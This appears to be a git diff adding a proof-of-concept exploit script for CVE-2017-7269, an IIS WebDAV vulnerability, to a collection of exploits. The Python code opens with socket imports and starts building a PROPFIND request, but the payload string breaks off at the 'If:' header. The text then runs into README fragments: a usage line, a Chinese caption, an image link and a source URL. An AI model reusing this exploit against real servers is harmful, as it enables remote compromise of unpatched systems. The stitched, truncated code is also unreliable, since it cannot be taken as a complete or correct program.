diff --git a/IIS/CVE-2017-7269-Echo-PoC/CVE-2017-7269_remote_echo.py b/IIS/CVE-2017-7269-Echo-PoC/CVE-2017-7269_remote_echo.py new file mode 100644 index 0000000..c09eb3b --- /dev/null +++ b/IIS/CVE-2017-7269-Echo-PoC/CVE-2017-7269_remote_echo.py @@ -0,0 +1,42 @@ + +import socket +import sys +import time + +def generate_payload(port): + pay='PROPFIND / HTTP/1.1\r\nHost: localhost:'+ port +'\r\nContent-Length: 0\r\n' + pay+='If: + +CVE-2017-7269_remote_echo.py ip_address port + +
+ +效果如下:
+ +![](./example.png) + +来源: https://github.com/lcatro/CVE-2017-7269-Echo-PoC \ No newline at end of file